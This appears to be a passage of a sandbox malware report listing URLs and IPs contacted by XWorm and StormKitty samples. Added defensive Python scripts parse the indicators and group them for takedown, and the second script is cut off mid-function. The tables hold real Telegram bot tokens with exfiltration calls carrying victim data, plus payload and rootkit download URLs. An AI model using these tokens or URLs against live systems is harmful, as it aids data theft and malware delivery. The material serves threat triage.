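The Telegram Bot API URLs in the table above each carry the operator's bot token, the receiving chat_id and, for sendMessage, the URL-encoded beacon body in a single string, which is what makes them the most useful indicators for takedown and attribution (the same chat_id is fed by more than one bot). The script below is an added example, not part of the Joe Sandbox report or of the analysed sample: it splits such URLs into their parts, decodes the XWorm beacon into key/value fields and groups bot ids by chat_id. The URLs in REPORT_URLS are copied from the table; the function names and the list itself are this example's own, and nothing is contacted over the network.

```python
"""Triage helper for Telegram Bot API exfiltration URLs (added example)."""
import re
from urllib.parse import parse_qs, urlsplit

# Constructed sample input: URL strings exactly as printed in the report above.
REPORT_URLS = [
    "https://api.telegram.org/bot7074211690:AAFHdtGIEk1j3FpHjh6_p8Xjh9rfZDo4uSc/"
    "sendMessage?chat_id=6291749148&text=%E2%98%A0%20%5BXWorm%20V5.2%5D%0D%0A%0D%0A"
    "New%20Clinet%20:%20%0D%0AE126416575CB5DA0505E%0D%0A%0D%0AUserName%20:%20user"
    "%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20False"
    "%0D%0ACPU%20:%20Error%0D%0AGPU%20:%20HGRRGE87%20%0D%0ARAM%20:%207.99%20GB"
    "%0D%0AGroub%20:%20XWorm%20V5.2",
    "https://api.telegram.org/bot7479631857:AAFuIUMNJYKHzJ3Bc9t4FSh9ZQXlqymhFnk/"
    "sendDocument?chat_id=6291749148",
    "https://api.telegram.org/bot5904946097:AAEb_US4tHY3ko2z9Y7a20zEv4AtQqZipKM/"
    "sendMessage?chat_id=5881759996&text=This+Not+RDP",
    "http://91.134.207.16/update.exe",  # plain payload download, must be skipped
]

# A bot token is "<numeric bot id>:<secret>"; the Bot API path is /bot<token>/<method>.
TELEGRAM_PATH = re.compile(
    r"^/bot(?P<bot_id>\d+):(?P<secret>[A-Za-z0-9_-]+)/(?P<method>[A-Za-z]+)$"
)
# XWorm and WorldWind beacons are "Key : Value" lines; headers without a colon are skipped.
BEACON_FIELD = re.compile(r"^\s*([^:]+?)\s*:\s*(.*?)\s*$")


def parse_telegram_c2(url):
    """Describe one Telegram Bot API call; return None for any other URL."""
    parts = urlsplit(url)
    if parts.hostname != "api.telegram.org":
        return None
    m = TELEGRAM_PATH.match(parts.path)
    if not m:  # e.g. the truncated memory string "https://api.telegram.org/bot"
        return None
    query = parse_qs(parts.query, keep_blank_values=True)
    # parse_qs already undoes %xx escapes and '+'; normalise CRLF so both families split alike
    text = query.get("text", [""])[0].replace("\r\n", "\n")
    return {
        "bot_id": m["bot_id"],
        "token": f"{m['bot_id']}:{m['secret']}",
        "method": m["method"],
        "chat_id": query.get("chat_id", [None])[0],
        "text": text,
    }


def beacon_fields(text):
    """Turn the 'Key : Value' lines of a decoded beacon into a dict."""
    fields = {}
    for line in text.splitlines():
        m = BEACON_FIELD.match(line)
        if m:
            fields[m[1]] = m[2]
    return fields


def operator_infrastructure(urls):
    """Map chat_id -> set of bot ids; one chat fed by several bots is one operator."""
    by_chat = {}
    for url in urls:
        rec = parse_telegram_c2(url)
        if rec is not None:
            by_chat.setdefault(rec["chat_id"], set()).add(rec["bot_id"])
    return by_chat


if __name__ == "__main__":
    for url in REPORT_URLS:
        rec = parse_telegram_c2(url)
        if rec is None:
            print(f"skip  {url}")
            continue
        print(f"bot {rec['bot_id']} -> chat {rec['chat_id']} via {rec['method']}")
        for key, value in beacon_fields(rec["text"]).items():
            print(f"    {key}: {value}")
    print(operator_infrastructure(REPORT_URLS))
```

Run against the four URLs it groups bots 7074211690 and 7479631857 under chat 6291749148 and bot 5904946097 under chat 5881759996, and renders the XWorm beacon as plain fields (UserName, OSFullName, RAM and so on) instead of the %0D%0A-encoded blob shown in the table. The token in each record is what a takedown request to Telegram needs; the chat_id is the better pivot for clustering further samples, since operators rotate bots more often than chats.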
Name | Source | Malicious | Antivirus Detection | Reputation
https://duckduckgo.com/chrome_newtab | tmpFAD4.tmp.dat.5.dr, tmpFB36.tmp.dat.5.dr, tmpFB32.tmp.dat.4.dr, tmpFB84.tmp.dat.4.dr | false | URL Reputation: safe | unknown
https://www.000webhost.com/static/default.000webhost.com/images/cdn/corgi-with-shades.svg | Window Security.exe, 00000006.00000002.2843829214.000000000325E000.00000004.00000800.00020000.00000000.sdmp, Window Security.exe, 00000006.00000002.2843829214.0000000003262000.00000004.00000800.00020000.00000000.sdmp | false | 1%, Virustotal, Browse; Avira URL Cloud: safe | unknown
https://duckduckgo.com/ac/?q= | tmpFAD4.tmp.dat.5.dr, tmpFB36.tmp.dat.5.dr, tmpFB32.tmp.dat.4.dr, tmpFB84.tmp.dat.4.dr | false | URL Reputation: safe | unknown
https://api.telegram.org/bot | svchost.exe.0.dr, crack.exe.0.dr | true | 1%, Virustotal, Browse; Avira URL Cloud: safe | unknown
https://api.telegram.org/bot5904946097:AAEb_US4tHY3ko2z9Y7a20zEv4AtQqZipKM/sendMessage?chat_id=58817 | crack.exe, 00000002.00000002.2043779712.00000000028B6000.00000004.00000800.00020000.00000000.sdmp | false | 2%, Virustotal, Browse; Avira URL Cloud: safe | unknown
https://go.microPackageManagementp | powershell.exe, 00000011.00000002.2181111799.0000000000737000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://github.com/LimerBoy/StormKitty | update.exe, 00000005.00000002.4469944759.00000000033D9000.00000004.00000800.00020000.00000000.sdmp, update.exe.0.dr, svchost.exe.0.dr | false | 2%, Virustotal, Browse; Avira URL Cloud: safe | unknown
https://aka.ms/pscore6lB | powershell.exe, 00000011.00000002.2245451019.00000000045B1000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://payloads-poison.000webhostapp.com/r77-x86.dll | Window Security.exe, 00000006.00000002.2843829214.00000000031FA000.00000004.00000800.00020000.00000000.sdmp | true | 8%, Virustotal, Browse; Avira URL Cloud: phishing | unknown
https://api.telegram.org/bot7479631857:AAFuIUMNJYKHzJ3Bc9t4FSh9ZQXlqymhFnk/sendDocument?chat_id=6291 | svchost.exe, 00000004.00000002.4469429984.000000000300B000.00000004.00000800.00020000.00000000.sdmp | false | 1%, Virustotal, Browse; Avira URL Cloud: safe | unknown
https://nuget.org/nuget.exe | powershell.exe, 00000011.00000002.2346034934.0000000005618000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://ip-api.com | Window Security.exe, 00000006.00000002.2843829214.00000000031FA000.00000004.00000800.00020000.00000000.sdmp, Window Security.exe, 00000006.00000002.2843829214.00000000031DE000.00000004.00000800.00020000.00000000.sdmp, Windows Security.exe, 00000010.00000002.4466012118.000000000255B000.00000004.00000800.00020000.00000000.sdmp, Windows Security.exe, 00000010.00000002.4466012118.0000000002504000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://91.134.207.16/WinSCP.com | Window Security.exe, 00000006.00000000.2008053302.0000000000CE2000.00000002.00000001.01000000.0000000B.sdmp, Window Security.exe.0.dr, Windows Security.exe.6.dr | false | 8%, Virustotal, Browse; Avira URL Cloud: safe | unknown
https://api.mylnikov.org | update.exe, 00000005.00000002.4469944759.00000000034EF000.00000004.00000800.00020000.00000000.sdmp | false | 3%, Virustotal, Browse; Avira URL Cloud: safe | unknown
http://api.ipify.org/ | Window Security.exe, 00000006.00000000.2008053302.0000000000CE2000.00000002.00000001.01000000.0000000B.sdmp, Window Security.exe.0.dr, Windows Security.exe.6.dr | false | 0%, Virustotal, Browse; Avira URL Cloud: safe | unknown
https://api.telegram.org/bot7074211690:AAFHdtGIEk1j3FpHjh6_p8Xjh9rfZDo4uSc/sendMessage | update.exe, 00000005.00000002.4469944759.00000000035F6000.00000004.00000800.00020000.00000000.sdmp, update.exe, 00000005.00000002.4469944759.0000000003575000.00000004.00000800.00020000.00000000.sdmp | true | 2%, Virustotal, Browse; Avira URL Cloud: safe | unknown
http://91.134.207.16/ngrok.exe | Windows Security.exe.6.dr | false | 9%, Virustotal, Browse; Avira URL Cloud: safe | unknown
http://api.telegram.orgd | svchost.exe, 00000004.00000002.4469429984.0000000003042000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.4469429984.0000000003032000.00000004.00000800.00020000.00000000.sdmp, update.exe, 00000005.00000002.4469944759.000000000358F000.00000004.00000800.00020000.00000000.sdmp, update.exe, 00000005.00000002.4469944759.00000000035F6000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://icanhazip.com | update.exe, 00000005.00000002.4469944759.0000000003495000.00000004.00000800.00020000.00000000.sdmp, update.exe, 00000005.00000002.4469944759.00000000034EF000.00000004.00000800.00020000.00000000.sdmp | false | 0%, Virustotal, Browse; Avira URL Cloud: safe | unknown
http://91.134.207.16/Install.exe | Window Security.exe, 00000006.00000000.2008053302.0000000000CE2000.00000002.00000001.01000000.0000000B.sdmp, Window Security.exe.0.dr, Windows Security.exe.6.dr | false | 11%, Virustotal, Browse; Avira URL Cloud: safe | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | crack.exe, 00000002.00000002.2043779712.00000000028B6000.00000004.00000800.00020000.00000000.sdmp, Cracked.exe, 00000003.00000002.2039417306.00000000034AC000.00000004.00000800.00020000.00000000.sdmp, Cracked.exe, 00000003.00000002.2039417306.0000000003051000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.4469429984.0000000002D11000.00000004.00000800.00020000.00000000.sdmp, update.exe, 00000005.00000002.4469944759.0000000003495000.00000004.00000800.00020000.00000000.sdmp, Window Security.exe, 00000006.00000002.2843829214.00000000031DE000.00000004.00000800.00020000.00000000.sdmp, Windows Defender Service Host.exe, 00000007.00000002.4466004136.0000000003001000.00000004.00000800.00020000.00000000.sdmp, Windows Security.exe, 00000010.00000002.4466012118.0000000002504000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2245451019.00000000045B1000.00000004.00000800.00020000.00000000.sdmp, Windows Security Health Service.exe, 0000001A.00000002.4466271061.0000000002CA1000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://go.microP | powershell.exe, 00000011.00000002.2181111799.0000000000737000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://freegeoip.net/xml/ | Window Security.exe, 00000006.00000000.2008053302.0000000000CE2000.00000002.00000001.01000000.0000000B.sdmp, Window Security.exe.0.dr, Windows Security.exe.6.dr | false | 0%, Virustotal, Browse; Avira URL Cloud: safe | unknown
https://www.000webhost.com/static/default.000webhost.com/images/cdn/corgi-eating-a-cassette.svg | Window Security.exe, 00000006.00000002.2843829214.0000000003262000.00000004.00000800.00020000.00000000.sdmp | false | 1%, Virustotal, Browse; Avira URL Cloud: safe | unknown
http://pesterbdd.com/images/Pester.png | powershell.exe, 00000011.00000002.2245451019.0000000004706000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://api.telegram.org/bot1119746739:AAGMhvpUjXI4CzIfizRC--VXilxnkJlhaf8/sendDocument?chat_id=1096 | svchost.exe, 00000004.00000002.4469429984.000000000300B000.00000004.00000800.00020000.00000000.sdmp | false | 2%, Virustotal, Browse; Avira URL Cloud: safe | unknown
http://schemas.xmlsoap.org/soap/encoding/ | powershell.exe, 00000011.00000002.2245451019.0000000004706000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://schemas.datacontract.org/2004/07/ | Window Security.exe, 00000006.00000002.2843829214.00000000031FA000.00000004.00000800.00020000.00000000.sdmp, Windows Security.exe, 00000010.00000002.4466012118.000000000255B000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 00000011.00000002.2245451019.0000000004706000.00000004.00000800.00020000.00000000.sdmp | false | 0%, Virustotal, Browse; Avira URL Cloud: safe | unknown
http://91.134.207.16/autoupdate1.exe | Window Security.exe, 00000006.00000000.2008053302.0000000000CE2000.00000002.00000001.01000000.0000000B.sdmp, Window Security.exe.0.dr, Windows Security.exe.6.dr | false | 12%, Virustotal, Browse; Avira URL Cloud: safe | unknown
https://api.telegram.org/bot1119746739:AAGMhvpUjXI4CzIfizRC--VXilxnkJlhaf8/send | svchost.exe, 00000004.00000002.4469429984.000000000300B000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000004.00000000.2005216319.00000000005B2000.00000002.00000001.01000000.00000008.sdmp, update.exe, 00000005.00000000.2006488022.0000000000C73000.00000002.00000001.01000000.0000000A.sdmp, update.exe.0.dr, svchost.exe.0.dr | false | 2%, Virustotal, Browse; Avira URL Cloud: safe | unknown
https://contoso.com/Icon | powershell.exe, 00000011.00000002.2346034934.0000000005618000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://api.mylnikov.org/geolocation/wifi?v=1.1&bssid= | update.exe, 00000005.00000002.4469944759.00000000034EF000.00000004.00000800.00020000.00000000.sdmp | false | 1%, Virustotal, Browse; Avira URL Cloud: safe | unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | tmpFAD4.tmp.dat.5.dr, tmpFB36.tmp.dat.5.dr, tmpFB32.tmp.dat.4.dr, tmpFB84.tmp.dat.4.dr | false | URL Reputation: safe | unknown
https://www.ecosia.org/newtab/ | tmpFAD4.tmp.dat.5.dr, tmpFB36.tmp.dat.5.dr, tmpFB32.tmp.dat.4.dr, tmpFB84.tmp.dat.4.dr | false | URL Reputation: safe | unknown
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br | places.raw.5.dr | false | URL Reputation: safe | unknown
https://github.com/Pester/Pester | powershell.exe, 00000011.00000002.2245451019.0000000004706000.00000004.00000800.00020000.00000000.sdmp | false | 1%, Virustotal, Browse; Avira URL Cloud: safe | unknown
http://crl.miu | powershell.exe, 00000011.00000002.2371162192.0000000006D80000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://www.ifconfig.me/ | crack.exe, 00000002.00000000.2003529884.0000000000442000.00000002.00000001.01000000.00000006.sdmp, crack.exe, 00000002.00000002.2043779712.0000000002851000.00000004.00000800.00020000.00000000.sdmp, crack.exe.0.dr | false | 0%, Virustotal, Browse; Avira URL Cloud: safe | unknown
https://github.com/LimerBoy/StormKitty0&eq | svchost.exe, 00000004.00000002.4469429984.0000000002D11000.00000004.00000800.00020000.00000000.sdmp, update.exe, 00000005.00000002.4469944759.0000000002F61000.00000004.00000800.00020000.00000000.sdmp | false | 3%, Virustotal, Browse; Avira URL Cloud: safe | unknown
http://91.134.207.16/update.exe | Window Security.exe, 00000006.00000000.2008053302.0000000000CE2000.00000002.00000001.01000000.0000000B.sdmp, Window Security.exe.0.dr, Windows Security.exe.6.dr | false | 11%, Virustotal, Browse; Avira URL Cloud: safe | unknown
http://schemas.xmlsoap.org/wsdl/ | powershell.exe, 00000011.00000002.2245451019.0000000004706000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://support.mozilla.org/products/firefoxgro.allizom.troppus.GVegJq3nFfBL | places.raw.5.dr | false | URL Reputation: safe | unknown
http://91.134.207.16/rdpinstall.exe | Window Security.exe, 00000006.00000000.2008053302.0000000000CE2000.00000002.00000001.01000000.0000000B.sdmp, Window Security.exe.0.dr, Windows Security.exe.6.dr | false | 10%, Virustotal, Browse; Avira URL Cloud: safe | unknown
https://api.telegram.orgd | update.exe, 00000005.00000002.4469944759.00000000035F6000.00000004.00000800.00020000.00000000.sdmp, update.exe, 00000005.00000002.4469944759.0000000003575000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://api.mylnikov.orgd | update.exe, 00000005.00000002.4469944759.0000000003556000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://api.telegram.org/file/bot | svchost.exe, 00000004.00000000.2005216319.00000000005B2000.00000002.00000001.01000000.00000008.sdmp, update.exe, 00000005.00000000.2006488022.0000000000C73000.00000002.00000001.01000000.0000000A.sdmp, update.exe.0.dr, svchost.exe.0.dr | false | Avira URL Cloud: safe | unknown
http://api.telegram.org | crack.exe, 00000002.00000002.2043779712.00000000028C9000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.4469429984.0000000003042000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.4469429984.0000000003032000.00000004.00000800.00020000.00000000.sdmp, update.exe, 00000005.00000002.4469944759.000000000358F000.00000004.00000800.00020000.00000000.sdmp, update.exe, 00000005.00000002.4469944759.00000000035F6000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://api.mylnikov.org | update.exe, 00000005.00000002.4469944759.0000000003556000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://91.134.207.16/ngrok.exe=set | Window Security.exe, 00000006.00000000.2008053302.0000000000CE2000.00000002.00000001.01000000.0000000B.sdmp, Window Security.exe.0.dr, Windows Security.exe.6.dr | false | Avira URL Cloud: safe | unknown
https://api.telegram.org/bot7479631857:AAFuIUMNJYKHzJ3Bc9t4FSh9ZQXlqymhFnk/sendMessage?chat_id=62917 | svchost.exe, 00000004.00000002.4469429984.0000000002DB4000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://api.telegram.org | crack.exe, 00000002.00000002.2043779712.00000000028B6000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.4469429984.0000000002DB4000.00000004.00000800.00020000.00000000.sdmp, update.exe, 00000005.00000002.4469944759.000000000358F000.00000004.00000800.00020000.00000000.sdmp, update.exe, 00000005.00000002.4469944759.00000000035F6000.00000004.00000800.00020000.00000000.sdmp | true | Avira URL Cloud: safe | unknown
https://contoso.com/License | powershell.exe, 00000011.00000002.2346034934.0000000005618000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://api.telegram.orgD | svchost.exe, 00000004.00000002.4469429984.0000000003032000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.4469429984.000000000300B000.00000004.00000800.00020000.00000000.sdmp | false | - | unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | tmpFAD4.tmp.dat.5.dr, tmpFB36.tmp.dat.5.dr, tmpFB32.tmp.dat.4.dr, tmpFB84.tmp.dat.4.dr | false | URL Reputation: safe | unknown
https://api.mylnikov.org/geolocation/wifi?v=1.1&bssid=00:50:56:a7:21:15d | update.exe, 00000005.00000002.4469944759.00000000034EF000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://91.134.207.16/WinSCP.exe | Window Security.exe, 00000006.00000000.2008053302.0000000000CE2000.00000002.00000001.01000000.0000000B.sdmp, Window Security.exe.0.dr, Windows Security.exe.6.dr | false | Avira URL Cloud: safe | unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | tmpFAD4.tmp.dat.5.dr, tmpFB36.tmp.dat.5.dr, tmpFB32.tmp.dat.4.dr, tmpFB84.tmp.dat.4.dr | false | URL Reputation: safe | unknown
https://contoso.com/ | powershell.exe, 00000011.00000002.2346034934.0000000005618000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://www.000webhost.com/static/default.000webhost.com/images/cdn/corgi-make-a-website.svg | Window Security.exe, 00000006.00000002.2843829214.000000000325E000.00000004.00000800.00020000.00000000.sdmp, Window Security.exe, 00000006.00000002.2843829214.0000000003262000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://a.optnmstr.com/app/js/api.min.js | Window Security.exe, 00000006.00000002.2843829214.0000000003262000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://api.telegram.org/bot7074211690:AAFHdtGIEk1j3FpHjh6_p8Xjh9rfZDo4uSc/sendMessage?chat_id=62917 | update.exe, 00000005.00000002.4469944759.00000000035F6000.00000004.00000800.00020000.00000000.sdmp, update.exe, 00000005.00000002.4469944759.0000000003575000.00000004.00000800.00020000.00000000.sdmp | true | Avira URL Cloud: safe | unknown
http://91.134.207.16/getrdp.exe | Window Security.exe, 00000006.00000000.2008053302.0000000000CE2000.00000002.00000001.01000000.0000000B.sdmp, Window Security.exe.0.dr, Windows Security.exe.6.dr | false | Avira URL Cloud: safe | unknown
https://www.000webhost.com/static/default.000webhost.com/images/cdn/000webhost-logo-coral-pink.svg | Window Security.exe, 00000006.00000002.2843829214.000000000325E000.00000004.00000800.00020000.00000000.sdmp, Window Security.exe, 00000006.00000002.2843829214.0000000003262000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://nuget.org/NuGet.exe | powershell.exe, 00000011.00000002.2346034934.0000000005618000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://raw.githubusercontent.com/LimerBoy/StormKitty/master/StormKitty/stub/packages/DotNetZip.1.13 | svchost.exe, 00000004.00000000.2005216319.00000000005B2000.00000002.00000001.01000000.00000008.sdmp, update.exe, 00000005.00000000.2006488022.0000000000C73000.00000002.00000001.01000000.0000000A.sdmp, update.exe.0.dr, svchost.exe.0.dr | false | Avira URL Cloud: safe | unknown
https://www.google.com/images/branding/product/ico/googleg_lodp.ico | tmpFAD4.tmp.dat.5.dr, tmpFB36.tmp.dat.5.dr, tmpFB32.tmp.dat.4.dr, tmpFB84.tmp.dat.4.dr | false | Avira URL Cloud: safe | unknown
https://www.000webhost.com/cpanel-login?utm_source=000&utm_medium=no-such-website&utm_campaign=pages | Window Security.exe, 00000006.00000002.2843829214.0000000003262000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://91.134.207.16 | Window Security.exe, 00000006.00000002.2843829214.0000000003276000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://91.134.207.16/autoupdate2.exe | Window Security.exe, 00000006.00000000.2008053302.0000000000CE2000.00000002.00000001.01000000.0000000B.sdmp, Window Security.exe.0.dr, Windows Security.exe.6.dr | false | Avira URL Cloud: safe | unknown
http://icanhazip.comd | update.exe, 00000005.00000002.4469944759.00000000034EF000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://icanhazip.com/t | update.exe, 00000005.00000002.4469944759.0000000003495000.00000004.00000800.00020000.00000000.sdmp | false
                              • Avira URL Cloud: safe
                              unknown
                              https://ac.ecosia.org/autocomplete?q=tmpFAD4.tmp.dat.5.dr, tmpFB36.tmp.dat.5.dr, tmpFB32.tmp.dat.4.dr, tmpFB84.tmp.dat.4.drfalse
                              • URL Reputation: safe
                              unknown
                              https://api.mylnikov.org/geolocation/wifi?v=1.1&update.exe, 00000005.00000002.4469944759.00000000034EF000.00000004.00000800.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              https://www.hostinger.com/special/000webhost?utm_source=000webhost&utm_medium=frontend&utm_campaign=Window Security.exe, 00000006.00000002.2843829214.000000000325E000.00000004.00000800.00020000.00000000.sdmp, Window Security.exe, 00000006.00000002.2843829214.0000000003262000.00000004.00000800.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              http://payloads-poison.000webhostapp.comWindow Security.exe, 00000006.00000002.2843829214.0000000003244000.00000004.00000800.00020000.00000000.sdmptrue
                              • Avira URL Cloud: phishing
                              unknown
                              https://payloads-poison.000webhostapp.com/r77-x64.dllkhttps://payloads-poison.000webhostapp.com/r77-Window Security.exe, 00000006.00000000.2008053302.0000000000CE2000.00000002.00000001.01000000.0000000B.sdmp, Window Security.exe.0.dr, Windows Security.exe.6.drtrue
                              • Avira URL Cloud: phishing
                              unknown
                              http://127.0.0.1:4040/api/tunnelsWindow Security.exe, 00000006.00000000.2008053302.0000000000CE2000.00000002.00000001.01000000.0000000B.sdmp, Window Security.exe.0.dr, Windows Security.exe.6.drfalse
                              • Avira URL Cloud: safe
                              unknown
                              https://api.teleupdate.exe, 00000005.00000002.4469944759.00000000033D9000.00000004.00000800.00020000.00000000.sdmptrue
                              • Avira URL Cloud: safe
                              unknown
                              https://payloads-poison.000webhostapp.comWindow Security.exe, 00000006.00000002.2843829214.00000000031FA000.00000004.00000800.00020000.00000000.sdmptrue
                              • Avira URL Cloud: phishing
                              unknown
                              http://us-east-1.route-1.000webhost.awex.ioWindow Security.exe, 00000006.00000002.2843829214.0000000003244000.00000004.00000800.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: malware
                              unknown
                              https://www.000webhost.com/free-website-sign-up?utm_source=000webhost&utm_medium=frontend&utm_campaiWindow Security.exe, 00000006.00000002.2843829214.000000000325E000.00000004.00000800.00020000.00000000.sdmp, Window Security.exe, 00000006.00000002.2843829214.0000000003262000.00000004.00000800.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              https://support.mozilla.orgplaces.raw.5.drfalse
                              • URL Reputation: safe
                              unknown
                              https://www.000webhost.com/static/default.000webhost.com/images/cdn/favicon.icoWindow Security.exe, 00000006.00000002.2843829214.0000000003262000.00000004.00000800.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
Contacted-IP distribution chart (not reproduced; legend buckets: No. of IPs < 25%, 25% to 50%, 50% to 75%, > 75%)
| IP | Domain | Country | ASN | ASN Name | Malicious |
|---|---|---|---|---|---|
| 149.154.167.220 | api.telegram.org | United Kingdom | 62041 | TELEGRAMRU | true |
| 208.95.112.1 | ip-api.com | United States | 53334 | TUT-ASUS | true |
| 167.99.94.206 | unknown | United States | 14061 | DIGITALOCEAN-ASNUS | true |
| 165.227.91.90 | unknown | United States | 14061 | DIGITALOCEAN-ASNUS | true |
| 146.190.29.250 | unknown | United States | 702 | UUNETUS | true |
| 104.16.185.241 | icanhazip.com | United States | 13335 | CLOUDFLARENETUS | true |
| 172.67.196.114 | api.mylnikov.org | United States | 13335 | CLOUDFLARENETUS | true |
| 64.23.232.116 | unknown | United States | 3064 | AFFINITY-FTLUS | true |
| 91.134.207.16 | unknown | France | 16276 | OVHFR | false |
| 185.252.232.158 | unknown | Germany | 46261 | QUICKPACKETUS | true |
| 145.14.144.231 | us-east-1.route-1.000webhost.awex.io | Netherlands | 204915 | AWEXUS | false |

Private / local IPs contacted:

| IP |
|---|
| 127.0.0.1 |
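The URL and IP tables above give the raw indicators but leave the triage to the reader, and the AV column is easy to misread: Avira rates the Telegram bot endpoint that the report marks malicious exactly as it rates a Google favicon ("safe"), because URL reputation scores the host, not how the sample uses it. The script below is an added example, not code from the Joe Sandbox report or from Joe Security. It takes a handful of rows constructed from this report's URL table and sorts them by what a responder should do with them: pull the bot id, token, API method and chat_id out of the Telegram URL so the channel can be reported rather than merely blocked; keep the loopback tunnel-agent API on 127.0.0.1:4040 (ngrok's default port, an inference the report does not make) and the public IP/geolocation lookups (icanhazip.com, ip-api.com, api.mylnikov.org) apart from the executable downloads off a bare OVH IP and off payloads-poison.000webhostapp.com; and list the rows where the report's Malicious flag and the AV verdict disagree. The categories and the recon-host list are the editor's assumptions, and the icanhazip and r77 URLs were trimmed of the trailing memory garbage the report shows.

```python
"""Triage the URL rows of a Joe Sandbox report into indicators a responder can act on.

Added example, not code from the report or from Joe Security. ROWS is constructed
from this report's own URL table (URL, source process, the report's Malicious
flag, the AV verdict). Assumptions: the categories and RECON_HOSTS are the
editor's; two strings were trimmed of the trailing memory garbage the report shows.
"""
import ipaddress
import re
from dataclasses import dataclass, field
from urllib.parse import parse_qs, urlsplit

ROWS = [
    ("https://api.telegram.org/bot7074211690:AAFHdtGIEk1j3FpHjh6_p8Xjh9rfZDo4uSc/sendMessage?chat_id=62917",
     "update.exe", True, "Avira URL Cloud: safe"),                      # chat_id truncated as in the report
    ("http://91.134.207.16/getrdp.exe", "Window Security.exe", False, "Avira URL Cloud: safe"),
    ("http://91.134.207.16/autoupdate2.exe", "Window Security.exe", False, "Avira URL Cloud: safe"),
    ("https://payloads-poison.000webhostapp.com/r77-x64.dll",           # first half of the fused string
     "Window Security.exe", True, "Avira URL Cloud: phishing"),
    ("http://127.0.0.1:4040/api/tunnels", "Window Security.exe", False, "Avira URL Cloud: safe"),
    ("http://icanhazip.com/", "update.exe", False, "Avira URL Cloud: safe"),   # trailing junk removed
    ("https://api.mylnikov.org/geolocation/wifi?v=1.1&", "update.exe", False, "Avira URL Cloud: safe"),
    ("https://www.google.com/images/branding/product/ico/googleg_lodp.ico",
     "tmpFAD4.tmp.dat", False, "Avira URL Cloud: safe"),
]

# Telegram Bot API path shape: /bot<numeric id>:<35-char secret>/<method>
TELEGRAM_BOT = re.compile(r"/bot(?P<bot_id>\d+):(?P<token>[A-Za-z0-9_-]{35})/(?P<method>[A-Za-z]+)")
# Public "what is my IP / where am I" services the sample queried (editor's list)
RECON_HOSTS = {"icanhazip.com", "ip-api.com", "api.mylnikov.org"}


@dataclass
class Indicator:
    url: str
    host: str
    source: str
    report_malicious: bool
    av_verdict: str
    category: str
    notes: list = field(default_factory=list)


def is_ip(host: str) -> bool:
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        return False


def categorise(url: str, host: str) -> str:
    """Bucket a URL by what a responder does with it: ignore, revoke, watch, block."""
    if host == "localhost" or (is_ip(host) and ipaddress.ip_address(host).is_loopback):
        return "local"            # tunnel agent's control API on the victim, not a network IOC
    if host.endswith("telegram.org") and TELEGRAM_BOT.search(url):
        return "exfil-channel"    # report the bot; blocking api.telegram.org alone is not enough
    if host in RECON_HOSTS:
        return "host-recon"       # noisy to block outright; useful as a behavioural signal
    if urlsplit(url).path.lower().endswith((".exe", ".dll")):
        return "payload-staging"  # block and retro-hunt in proxy logs
    return "uncategorised"


def triage(rows) -> list:
    out = []
    for url, source, malicious, verdict in rows:
        host = urlsplit(url).hostname or ""
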